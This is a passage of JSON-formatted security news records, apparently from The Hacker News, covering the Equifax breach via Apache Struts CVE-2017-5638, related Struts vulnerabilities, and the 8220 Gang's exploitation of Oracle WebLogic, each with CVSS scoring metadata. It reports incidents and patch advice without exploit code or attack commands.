the end of July, exposing highly [sensitive data of as many as 145 million people](<https://thehackernews.com/2017/10/equifax-credit-security-breach.html>) globally. \n \nThe stolen information included victims' names, dates of birth, phone numbers, driver's license details, addresses, and social security numbers, along with credit card information and personally identifying information (PII) for hundreds of thousands of its consumers. \n \nThe data breach occurred because the company failed to patch a [critical Apache Struts 2 vulnerability](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) ([CVE-2017-5638](<https://thehackernews.com/2017/03/apache-struts-framework.html>)) on time, for which patches were already issued by the respected companies. \n \n\n\n## Why U.K. Has Fined a US Company?\n\n \nThe UK's Information Commissioner's Office (ICO), who launched a joint investigation into the breach with the Financial Conduct Authority, has now [issued](<https://ico.org.uk/about-the-ico/news-and-events/news-and-blogs/2018/09/credit-reference-agency-equifax-fined-for-security-breach/>) its largest possible monetary penalty under the country's Data Protection Act for the massive data breach\u2014\u00a3500,000, which equals to around $665,000. \n \nThe ICO said that although the [cyber attack compromised Equifax](<https://thehackernews.com/2017/09/equifax-data-breach.html>) systems in the United States, the company \"failed to take appropriate steps\" to protect the personal information of its 15 million UK customers. \n \nThe ICO investigation revealed \"multiple failures\" at the company like keeping users' personal information longer than necessary, which resulted in: \n\n\n * 19,993 UK customers had their names, dates of birth, telephone numbers and driving license numbers exposed.\n * 637,430 UK customers had their names, dates of birth and telephone numbers exposed.\n * Up to 15 million UK customers had names and dates of birth exposed.\n * Some 27,000 Britishers also had their Equifax account email addresses swiped.\n * 15,000 UK customers also had their names, dates of birth, addresses, account usernames and plaintext passwords, account recovery secret questions, and answers, obscured credit card numbers, and spending amounts stolen by hackers.\n \n\n\n## Breach Was Result of Multiple Failures at Equifax\n\n \nThe ICO said that Equifax had also been warned about a [critical Apache Struts 2 vulnerability](<https://thehackernews.com/2017/03/apache-struts-framework.html>) in its systems by the United States Department of Homeland Security (DHS) in March 2017, but the company did not take appropriate steps to fix the issue. \n \nInitially, it was also reported that the company kept news of the [breach hidden for a month](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) after its internal discovery, giving three senior executives at Equifax time to sell almost $2 million worth of its shares, though the company denied such claims. \n \nSince the data breach happened before the EU's General Data Protection Regulation (GDPR) took effect in May 2018, the maximum fine of \u00a3500,000 imposed under the UK's old Data Protection Act 1998 is still lesser. \n \nThe penalty could have been much larger had it fallen under GDPR, wherein a company could face a [maximum fine of 20 million euros](<https://thehackernews.com/2017/08/data-breach-security-law.html>) or 4 percent of its annual global revenue, whichever is higher, for such a privacy breach. \n \nIn response to the ICO's penalty, Equifax said that the company has fully cooperated with the ICO throughout the investigation that it is \"disappointed in the findings and the penalty.\" \n \nEquifax received the Monetary Penalty Notice from the ICO on Wednesday and can appeal the penalty.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-09-20T13:54:00", "type": "thn", "title": "UK Regulator Fines Equifax \u00a3500,000 Over 2017 Data Breach", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-09-20T13:54:52", "id": "THN:AF93AEDBDE6169AD1163D53979A4EA04", "href": "https://thehackernews.com/2018/09/equifax-credit-reporting-breach.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-27T09:17:53", "description": "[](<https://4.bp.blogspot.com/-7t3BApLnYmI/WdM9FFq_vsI/AAAAAAAAATQ/KVrOmkm6SzoTm_8rLuSGnUbnhJudoRXwwCLcBGAs/s1600/equifax-data-breach.png>)\n\n[Equifax data breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) was bigger than initially reported, exposing highly sensitive information of more Americans than previously revealed. \n \nCredit rating agency Equifax says an additional 2.5 million U.S. consumers were also impacted by the massive data breach the company disclosed last month, bringing the total possible victims to 145.5 million from 143 million. \n \nEquifax last month announced that it had suffered a massive data breach that exposed highly sensitive data of hundreds of millions of its customers, which includes names, social security numbers, dates of birth and addresses. \n \nIn addition, credit card information for [nearly 209,000 customers](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) was also stolen, as well as certain documents with personally identifying information (PII) for approximately 182,000 Equifax consumers. \n \nThe breach was due to a critical vulnerability ([CVE-2017-5638](<https://thehackernews.com/2017/03/apache-struts-framework.html>)) in Apache Struts 2 framework, which Apache patched over two months earlier (on March 6) of the security incident. \n \nEquifax was even [informed by the US-CERT](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) on March 8 to patch the flaw, but the company failed to identified or patched its systems against the issue, Equifax ex-CEO Richard Smith said in a statement [[PDF](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>)] to the House Committee on Energy and Commerce. \n\n\n> \"It appears that the breach occurred because of both human error and technology failures,\" Smith said. \"Equifax's information security department also ran scans that should have identified any systems that were vulnerable to the Apache Struts issue...Unfortunately, however, the scans did not identify the Apache Struts vulnerability.\"\n\nIn the wake of the security incident, the company hired FireEye-owned security firm Mandiant to investigate the breach, which has now concluded the forensic portion of its investigation and plans to release the results \"promptly.\" \n \nMandiant said a total of 145.5 million consumers might now potentially have been [impacted by the breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>), which is 2.5 million more than previously estimated. However, the firm did not identify any evidence of \"new attacker activity.\" \n\n\n> \"Mandiant did not identify any evidence of additional or new attacker activity or any access to new databases or tables,\" Equifax said in a Monday [press release](<https://investor.equifax.com/news-and-events/news/2017/10-02-2017-213238821>). \n\n> \"Instead, this additional population of consumers was confirmed during Mandiant's completion of the remaining investigative tasks and quality assurance procedures built into the investigative process.\"\n\nThe forensic investigation also found that approximately 8,000 Canadian consumers were also impacted, which is much lower than the 100,000 initially estimated figure by the credit rating and reporting firm. \n \nHowever, Equifax said that this figure \"was preliminary and did not materialize.\" \n \n\"I want to apologize again to all impacted consumers. As this important phase of our work is now completed, we continue to take numerous steps to review and enhance our cybersecurity practices,\" newly appointed interim CEO, Paulino do Rego Barros, Jr. said. \n \n\"We also continue to work closely with our internal team and outside advisors to implement and accelerate long-term security improvements.\" \n \nEquifax, which maintains data on over 820 million consumers and over 91 million businesses worldwide, also said the company would update its own notification by October 8 for its customers who want to check if they were among those affected by the data breach.\n", "cvss3": {}, "published": "2017-10-02T21:23:00", "type": "thn", "title": "Whoops, Turns Out 2.5 Million More Americans Were Affected By Equifax Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-10-03T08:23:36", "id": "THN:ACD3479531482E2CA5A8E15EB6B47523", "href": "https://thehackernews.com/2017/10/equifax-credit-security-breach.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:16", "description": "[](<https://4.bp.blogspot.com/-YbGPFiDfo54/WMFEMrkhUUI/AAAAAAAArt0/axO9fhieprw6xBp0DoBNdECPB4t_le8uwCLcB/s1600/apache-struts-framework.png>)\n\nSecurity researchers have discovered a Zero-Day vulnerability in the popular Apache Struts web application framework, which is being actively exploited in the wild. \n \nApache Struts is a free, open-source, Model-View-Controller (MVC) framework for creating elegant, modern Java web applications, which supports REST, AJAX, and JSON. \n \nIn a [blog post](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) published Monday, Cisco's Threat intelligence firm Talos announced the team observed a number of active attacks against the zero-day vulnerability (CVE-2017-5638) in Apache Struts. \n \nAccording to the researchers, the issue is a remote code execution vulnerability in the Jakarta Multipart parser of Apache Struts that could allow an attacker to execute malicious commands on the server when uploading files based on the parser. \n\n\n> \"It is possible to perform an RCE attack with a malicious Content-Type value,\" [warned](<https://cwiki.apache.org/confluence/display/WW/S2-045>) Apache. \"If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user.\"\n\nThe vulnerability, documented at Rapid7's Metasploit Framework [GitHub site](<https://github.com/rapid7/metasploit-framework/issues/8064>), has been patched by Apache. So, if you are using the Jakarta-based file upload Multipart parser under Apache Struts 2, you are advised to upgrade to Apache Struts version 2.3.32 or 2.5.10.1 immediately. \n \n\n\n### Exploit Code Publicly Released\n\n \nSince the Talos researchers detected public proof-of-concept (PoC) exploit code (which was uploaded to a Chinese site), the vulnerability is quite dangerous. \n \nThe researchers even detected \"a high number of exploitation events,\" the majority of which seem to be leveraging the publicly released PoC that is being used to run various malicious commands. \n\n\n[](<https://2.bp.blogspot.com/-OMaYI0kDfZk/WME-W6XvmwI/AAAAAAAArtc/4rw52IxHjJYLJOlufdQEoxxQwjYWAbGmQCLcB/s1600/apache-exploit-code.png>)\n\nIn some cases, the attackers executed simple \"whoami\" commands to see if the target system is vulnerable, while in others, the malicious attacks turned off firewall processes on the target and dropped payloads. \n\n\n[](<https://2.bp.blogspot.com/-1fS7Z-ZsPgA/WME-E_vWvTI/AAAAAAAArtY/k_8FmAtSwaU9ICPEjN1gQMTdPHsQSRyFACLcB/s1600/apache-exploit.png>)\n\n \n\n\n> \"Final steps include downloading a malicious payload from a web server and execution of said payload,\" the researchers say. \"The payloads have varied but include an IRC bouncer, a DoS bot, and a sample related to the Bill Gates botnet... A payload is downloaded and executed from a privileged account.\"\n\nAttackers also attempted to gain persistence on infected hosts by adding a binary to the boot-up routine. \n \nAccording to the researchers, the attackers tried to copy the file to a benign directory and ensure_ \"that both the executable runs and that the firewall service will be disabled when the system boots.\"_ \n \nBoth Cisco and Apache researchers urge administrators to upgrade their systems to Apache Struts version 2.3.32 or 2.5.10.1 as soon as possible. Admins can also switch to a different [implementation](<https://cwiki.apache.org/confluence/display/WW/File+Upload#FileUpload-AlternateLibraries>) of the Multipart parser.\n", "cvss3": {}, "published": "2017-03-09T01:03:00", "type": "thn", "title": "New Apache Struts Zero-Day Vulnerability Being Exploited in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-09T12:03:10", "id": "THN:2707247140A4F620671B33D68FEB1EA9", "href": "https://thehackernews.com/2017/03/apache-struts-framework.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-05-20T04:20:39", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEizlh5mMqULGZoEUCSUsIGyrfUbX7pDgNnO0QGjYLR34RYFpT7725uwKCJ2-ZzmnzN2a86A0-jOxUWvF3QBi4wgKoMWaXPXOmBZyLYDrBvlzvOPtzidIZRxvfwoQ0Ewkf3WZRA06l4IaBb_ym3vgS1wFJgwlvxlkTgUpPHT_s_PU_jt_aq3sjJ1Nr5P/s728-e365/oracle.png>)\n\nThe notorious cryptojacking group tracked as **8220 Gang** has been spotted weaponizing a six-year-old security flaw in Oracle WebLogic servers to ensnare vulnerable instances into a botnet and distribute cryptocurrency mining malware.\n\nThe flaw in question is [CVE-2017-3506](<https://nvd.nist.gov/vuln/detail/CVE-2017-3506>) (CVSS score: 7.4), which, when successfully exploited, could allow an unauthenticated attacker to execute arbitrary commands remotely.\n\n\"This allows attackers to gain unauthorized access to sensitive data or compromise the entire system,\" Trend Micro researcher Sunil Bharti [said](<https://www.trendmicro.com/en_us/research/23/e/8220-gang-evolution-new-strategies-adapted.html>) in a report published this week.\n\n8220 Gang, [first documented](<https://blog.talosintelligence.com/2018/12/cryptomining-campaigns-2018.html>) by Cisco Talos in late 2018, is so named for its original use of port 8220 for command-and-control (C2) network communications.\n\n\"8220 Gang identifies targets via scanning for misconfigured or vulnerable hosts on the public internet,\" SentinelOne [noted](<https://www.sentinelone.com/blog/8220-gang-cloud-botnet-targets-misconfigured-cloud-workloads/>) last year. \"8220 Gang is known to make use of SSH brute force attacks post-infection for the purposes of lateral movement inside a compromised network.\"\n\nEarlier this year, Sydig [detailed](<https://thehackernews.com/2023/03/new-scrubcrypt-crypter-used-in.html>) attacks mounted by the \"low-skill\" crimeware group between November 2022 and January 2023 that aim to breach vulnerable Oracle WebLogic and Apache web servers and deploy a cryptocurrency miner.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjsrkw0SZH6Ikq0Z9DLG0U33w-XB7-yh2b3sMcZVNJgleN1_awQiDo0ZACvSPRAJdWbMXLnsw8DZfcjmyqjWH8KM0xTQ10cKWVnuJrEtKanSIMv8YMa27dxSEqLE3DHsEY9qJUJY9Xdnqjet58z3Gkn7np_XhG4rEeNPlqyRerUqg7CCi8D-YJ3a0Ml/s728-e365/tm.png>)\n\nIt has also been observed making use of an off-the-shelf malware downloader known as [PureCrypter](<https://thehackernews.com/2023/02/purecrypter-malware-targets-government.html>) as well as a crypter codenamed [ScrubCrypt](<https://thehackernews.com/2023/03/new-scrubcrypt-crypter-used-in.html>) to conceal the miner payload and evade detection by security software.\n\nIn the latest attack chain documented by Trend Micro, the Oracle WebLogic Server vulnerability is leveraged to deliver a PowerShell payload, which is then used to create another obfuscated PowerShell script in memory.\n\nThis newly created PowerShell script disables Windows Antimalware Scan Interface ([AMSI](<https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal>)) detection and launches a Windows binary that subsequently reaches out to a remote server to retrieve a \"meticulously obfuscated\" payload.\n\nThe intermediate DLL file, for its part, is configured to download a cryptocurrency miner from one of the three C2 servers \u2013 179.43.155[.]202, work.letmaker[.]top, and su-94.letmaker[.]top \u2013 using TCP ports 9090, 9091, or 9092.\n\nTrend Micro said recent attacks have also entailed the misuse of a legitimate Linux tool called [lwp-download](<https://linux.die.net/man/1/lwp-download>) to save arbitrary files on the compromised host.\n\n\"lwp-download is a Linux utility present in a number of platforms by default, and 8220 Gang making this a part of any malware routine can affect a number of services even if it were reused more than once,\" Bharti said.\n\n\"Considering the threat actor's tendency to reuse tools for different campaigns and abuse legitimate tools as part of the arsenal, organizations' security teams might be challenged to find other detection and blocking solutions to fend off attacks that abuse this utility.\"\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2023-05-18T09:31:00", "type": "thn", "title": "8220 Gang Exploiting Oracle WebLogic Flaw to Hijack Servers and Mine Cryptocurrency", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3506"], "modified": "2023-05-20T04:02:02", "id": "THN:64BCAF6F8AC86911192766ED3D6AA28D", "href": "https://thehackernews.com/2023/05/8220-gang-exploiting-oracle-weblogic.html", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2018-01-27T09:17:55", "description": "[](<https://3.bp.blogspot.com/-F7ViQ9JXvL8/Wbo_3TiAKWI/AAAAAAAAAJM/fsHVxS_O8ysIy4sZ2wdnG1OfLkiNJTjzgCLcBGAs/s1600/equifax-apache-struts.png>)\n\nThe [massive Equifax data breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) that exposed highly sensitive data of as many as 143 million people was caused by [exploiting a flaw in Apache Struts](<https://thehackernews.com/2017/03/apache-struts-framework.html>) framework, which Apache patched over two months earlier of the security incident, Equifax has confirmed. \n \nCredit rating agency Equifax is yet another example of the companies that became victims of massive cyber attacks due to not patching a critical vulnerability on time, for which patches were already issued by the respected companies. \n \nRated critical with a maximum 10.0 score, the Apache Struts2 vulnerability (CVE-2017-5638) exploited in the Equifax breach was disclosed and fixed by Apache on March 6 with the release of Apache Struts version 2.3.32 or 2.5.10.1. \n \nThis flaw is separate from CVE-2017-9805, [another Apache Struts2 vulnerability](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) that was patched earlier this month, which was a programming bug that manifests due to the way Struts REST plugin handles XML payloads while deserializing them, and was fixed in Struts version 2.5.13. \n \nRight after the disclosure of the vulnerability, hackers started actively exploiting the flaw in the wild to install rogue applications on affected web servers after its [proof-of-concept (PoC) exploit code](<https://thehackernews.com/2017/03/apache-struts-framework.html>) was uploaded to a Chinese site. \n \nDespite patches were made available and proofs that the flaw was already under mass attack by hackers, Equifax failed to patched its Web applications against the flaw, which resulted in the breach of personal data of [nearly half of the US population](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>). \n\n\n> \"Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cyber security firm to determine what information was accessed and who have been impacted,\" the company officials wrote in an [update on the website](<https://www.equifaxsecurity2017.com/>) with a new \"A Progress Update for Consumers.\" \n\n> \"We [know that](<https://www.equifaxsecurity2017.com/2017/09/13/progress-update-consumers-4/>) criminals exploited a US website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\"\n\nCVE-2017-5638 was a then-zero-day vulnerability discovered in the [popular Apache Struts](<https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html>) web application framework by Cisco's Threat intelligence firm Talos, which observed a number of active attacks exploiting the flaw. \n \nThe issue was a remote code execution bug in the Jakarta Multipart parser of Apache Struts2 that could allow an attacker to execute malicious commands on the server when uploading files based on the parser. \n \nAt the time, Apache warned it was possible to perform a remote code execution attack with \"a malicious Content-Type value,\" and if this value is not valid \"an exception is thrown which is then used to display an error message to a user.\" \n \n**Also Read: **[Steps You Should Follow to Protect Yourself From Equifax Breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) \n \nFor those unaware, Apache Struts is a free, open-source MVC framework for developing web applications in the Java programming language that run both front-end and back-end Web servers. The framework is used by 65n per cent of the Fortune 100 companies, including Lockheed Martin, Vodafone, Virgin Atlantic, and the IRS. \n \nSince the hackers are actively exploiting the vulnerabilities in the Apache Struts web framework, Cisco has also [initiated an investigation](<https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html>) into its products against four newly discovered security vulnerabilities in Apache Struts2. \n \nOther companies that also incorporate a version of Apache Struts 2 should also check their infrastructures against these vulnerabilities. \n \nEquifax is currently offering free credit-monitoring and identity theft protection services for people who are affected by the massive data leak and has also enabled a security freeze for access to people's information. \n \nWhile the company was initially criticised for generating a PIN that was simply a time and date stamp and easy-to-guess, the PIN generation method was later changed to randomly generate numbers.\n", "cvss3": {}, "published": "2017-09-13T21:38:00", "type": "thn", "title": "Equifax Suffered Data Breach After It Failed to Patch Old Apache Struts Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-15T10:00:54", "id": "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "href": "https://thehackernews.com/2017/09/equifax-apache-struts.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-09T12:40:18", "description": "[](<https://thehackernews.com/images/-ktDJMSI6Gdo/W310Im7Od5I/AAAAAAAAx8k/iNNQd5VURi8zRV8-MZosbkEo-V4eXjqowCLcBGAs/s728-e100/apache-struts-vulnerability-hacking.png>)\n\nSemmle security researcher Man Yue Mo has [disclosed](<https://lgtm.com/blog/apache_struts_CVE-2018-11776>) a critical remote code execution vulnerability in the popular Apache Struts web application framework that could allow remote attackers to run malicious code on the affected servers. \n \nApache Struts is an open source framework for developing web applications in the Java programming language and is widely used by enterprises globally, including by 65 percent of the Fortune 100 companies, like Vodafone, Lockheed Martin, Virgin Atlantic, and the IRS. \n \nThe vulnerability (**CVE-2018-11776**) resides in the core of Apache Struts and originates because of insufficient validation of user-provided untrusted inputs in the core of the Struts framework under certain configurations. \n \nThe newly found Apache Struts exploit can be triggered just by visiting a specially crafted URL on the affected web server, allowing attackers to execute malicious code and eventually take complete control over the targeted server running the vulnerable application. \n \n\n\n## Struts2 Vulnerability - Are You Affected?\n\n \nAll applications that use Apache Struts\u2014supported versions (Struts 2.3 to Struts 2.3.34, and Struts 2.5 to Struts 2.5.16) and even some unsupported Apache Struts versions\u2014are potentially vulnerable to this flaw, even when no additional plugins have been enabled. \n \n\n\n> \"This vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers,\" Yue Mo said.\n\n \nYour Apache Struts implementation is vulnerable to the reported RCE flaw if it meets the following conditions: \n\n\n * The **alwaysSelectFullNamespace** flag is set to true in the Struts configuration.\n * Struts configuration file contains an \"action\" or \"url\" tag that does not specify the optional namespace attribute or specifies a wildcard namespace.\nAccording to the researcher, even if an application is currently not vulnerable, \"an inadvertent change to a Struts configuration file may render the application vulnerable in the future.\" \n \n\n\n## Here's Why You Should Take Apache Struts Exploit Seriously\n\n \nLess than a year ago, credit rating agency Equifax exposed [personal details of its 147 million consumers](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) due to their failure of patching a similar [Apache Struts flaw](<https://thehackernews.com/2017/03/apache-struts-framework.html>) that was disclosed earlier that year (CVE-2017-5638). \n \nThe Equifax breach cost the company over $600 million in losses. \n\n\n> \"Struts is used for publicly-accessible customer-facing websites, vulnerable systems are easily identified, and the flaw is easy to exploit,\" said Pavel Avgustinov, Co-founder &amp; VP of QL Engineering at Semmle.\n\n> \"A hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system.\"\n\n \n\n\n## Patch Released for Critical Apache Struts Bug\n\n[](<https://thehackernews.com/images/-aZ6JnELsib4/W31pGhAz6bI/AAAAAAAAx8M/0d3umSPy5YATSc8sNXCx5cKejhIftncEgCLcBGAs/s728-e100/apache-struts-vulnerability-exploit.png>)\n\nApache Struts has fixed the vulnerability with the release of Struts versions 2.3.35 and 2.5.17. Organizations and developers who use Apache Struts are urgently advised to upgrade their Struts components as soon as possible. \n \nWe have seen how previous disclosures of similar critical flaws in Apache Struts have resulted in [PoC exploits](<https://thehackernews.com/2017/03/apache-struts-framework.html>) being published within a day, and exploitation of the [vulnerability in the wild](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>), putting critical infrastructure as well as customers' data at risk. \n \nTherefore, users and administrators are strongly advised to upgrade their Apache Struts components to the latest versions, even if they believe their configuration is not vulnerable right now. \n \nThis is not the first time the Semmle Security Research Team has reported a critical RCE flaw in Apache Struts. Less than a year ago, the team disclosed a similar [remote code execution vulnerability](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) (CVE-2017-9805) in Apache Struts. \n \n\n\n## UPDATE \u2014 Apache Struts RCE Exploit PoC Released\n\n[](<https://thehackernews.com/images/-fNjQzu1b7iw/W376YS-nYjI/AAAAAAAAx9I/T7MopN2IxtwTxicu4k8j55ywy0GbIRQHgCLcBGAs/s728-e100/apache-struts-exploit-poc-rce-vulnerability.png>)\n\nA security researcher has today released [a PoC exploit](<https://github.com/jas502n/St2-057/blob/master/README.md>) for the newly discovered remote code execution (RCE) vulnerability (CVE-2018-11776) in Apache Struts web application framework.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-08-22T14:04:00", "type": "thn", "title": "New Apache Struts RCE Flaw Lets Hackers Take Over Web Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805", "CVE-2018-11776"], "modified": "2018-08-23T18:30:56", "id": "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "href": "https://thehackernews.com/2018/08/apache-struts-vulnerability.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-27T10:06:55", "description": "[](<https://3.bp.blogspot.com/-_apYSKyOUKo/Wbe7DDGoMfI/AAAAAAAAC0o/yPE-wNpS2n83-GU6fD28_WevBKtwhDX1gCLcBGAs/s1600/apache-struts-cisco.jpg>)\n\nAfter [Equifax massive data breach](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) that was believed to be caused due to [a vulnerability in Apache Struts](<https://thehackernews.com/2017/03/apache-struts-framework.html>), Cisco has initiated an investigation into its products that incorporate a version of the popular Apache Struts2 web application framework. \n \nApache Struts is a free, open-source MVC framework for developing web applications in the Java programming language, and used by 65 percent of the Fortune 100 companies, including Lockheed Martin, Vodafone, Virgin Atlantic, and the IRS. \n \nHowever, the popular open-source software package was recently found affected by multiple vulnerabilities, including two remote code execution vulnerabilities\u2014one discovered earlier this month, and another in March\u2014one of which is [believed to be used](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>) to breach personal data of over [143 million Equifax users](<https://thehackernews.com/2017/09/equifax-data-breach.html>). \n \nSome of Cisco products including its Digital Media Manager, MXE 3500 Series Media Experience Engines, Network Performance Analysis, Hosted Collaboration Solution for Contact Center, and Unified Contact Center Enterprise have been found vulnerable to multiple Apache Struts flaws. \n \n\n\n### Cisco Launches Apache Struts Vulnerability Hunting\n\n \nCisco is also testing rest of its products against four newly discovered security vulnerability in Apache Struts2, including the one (CVE-2017-9805) [we reported on September 5](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) and the remaining three also disclosed last week. \n \nHowever, the remote code execution bug (CVE-2017-5638) that was [actively exploited back in March](<https://thehackernews.com/2017/03/apache-struts-framework.html>) this year is not included by the company in its recent security audit. \n \nThe three vulnerabilities\u2014CVE-2017-9793, CVE-2017-9804 and CVE-2017-9805\u2014included in the [Cisco security audit](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170907-struts2>) was released by the Apache Software Foundation on 5th September with the release of Apache Struts 2.5.13 which patched the issues. \n \nThe fourth vulnerability (CVE-2017-12611) that is being [investigated by Cisco](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170909-struts2-rce>) was released on 7th September with the release of Apache Struts 2.3.34 that fixed the flaw that resided in the Freemarker tag functionality of the Apache Struts2 package and could allow an unauthenticated, remote attacker to execute malicious code on an affected system. \n \n\n\n### Apache Struts Flaw Actively Exploited to Hack Servers &amp; Deliver Malware\n\n \nComing on to the most severe of all, CVE-2017-9805 (assigned as critical) is a programming bug that manifests due to the way Struts REST plugin handles XML payloads while deserializing them. \n \nThis could allow a remote, unauthenticated attacker to achieve remote code execution on a host running a vulnerable version of Apache Struts2, and Cisco's Threat intelligence firm Talos has [observed](<http://blog.talosintelligence.com/2017/09/apache-struts-being-exploited.html>) that this flaw is [under active exploitation](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) to find vulnerable servers. \n \nSecurity researchers from data centre security vendor Imperva recently [detected](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>) and blocked thousands of attacks attempting to exploit this Apache Struts2 vulnerability (CVE-2017-9805), with roughly 80 percent of them tried to deliver a malicious payload. \n \nThe majority of attacks originated from China with a single Chinese IP address registered to a Chinese e-commerce company sending out more than 40% of all the requests. Attacks also came from Australia, the U.S., Brazil, Canada, Russia and various parts of Europe. \n \nOut of the two remaining flaws, one (CVE-2017-9793) is again a vulnerability in the REST plug-in for Apache Struts that manifests due to \"insufficient validation of user-supplied input by the XStream library in the REST plug-in for the affected application.\" \n \nThis flaw has been given a Medium severity and could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on targeted systems. \n \nThe last flaw 